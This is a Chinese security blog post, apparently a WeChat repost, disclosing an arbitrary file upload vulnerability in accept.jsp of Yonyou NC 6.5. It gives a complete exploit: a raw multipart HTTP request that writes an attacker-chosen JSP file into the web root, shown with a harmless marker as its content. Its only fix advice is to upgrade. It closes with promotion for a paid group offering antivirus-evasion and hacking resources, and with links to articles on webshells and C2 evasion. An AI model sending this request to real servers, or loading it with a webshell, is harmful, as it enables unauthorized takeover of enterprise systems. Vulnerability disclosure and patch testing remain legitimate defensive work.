用友NC6.5 文件上传漏洞(附EXP)
2023-11-7 23:47:9 Author: 渗透安全团队(查看原文) 阅读量:19 收藏

0x01 前言

   
用友NC是大型企业管理与电子商务平台。该平台 accept.jsp处存在任意文件上传漏洞,攻击者通过漏洞可以获取网站权限

0x02 漏洞影响

    影响版本

NC 6.5

0x03 漏洞利用

登录界面

EXP:

POST /aim/equipmap/accept.jsp HTTP/1.1Host: 127.0.0.1:9100User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36Connection: closeContent-Length: 443Accept: */*Accept-Encoding: gzipContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYcContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"Content-Type: text/plain
<% out.println("435352Els1K9wZvOlSsdsdmrg"); %>-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYcContent-Disposition: form-data; name="fname"
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

文件上传成功!

0x04 修复方案

请升级最新版本。 


付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

加入安全交流群

                               

关 注 有 礼

关注下方公众号回复“666”可以领取一套领取黑客成长秘籍

 还在等什么?赶紧点击下方名片关注学习吧!


干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247511775&idx=2&sn=7588a8598110c2091862209bc0998bf9&chksm=c1765370f601da664768156ecac26a190429666ae4926e4d9c609c6d29dc11b2f4201ae03047&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh